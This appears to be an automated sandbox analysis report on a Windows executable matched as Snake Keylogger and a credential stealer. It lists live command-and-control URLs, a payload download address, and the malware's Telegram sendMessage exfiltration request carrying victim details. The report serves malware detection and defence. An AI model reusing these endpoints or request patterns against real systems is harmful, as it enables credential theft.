Windows Analysis Report MC8017774DOCS.exe

Uses insecure TLS / SSL version for HTTPS connection

Source: MC8017774DOCS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2

Source: MC8017774DOCS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 185.244.144.68 185.244.144.68

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49801 -> 185.244.144.68:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49808 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49838 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49821 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49890 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49902 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49871 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49882 -> 172.67.177.134:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: mertvinc.com.tr
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: the.drillmmcsnk.top

Source: unknown

HTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 06:10:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453633751.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW
Source: MC8017774DOCS.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top/den/P4.php
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://the.drillmmcsnk.top/den/api.php
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040543E

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
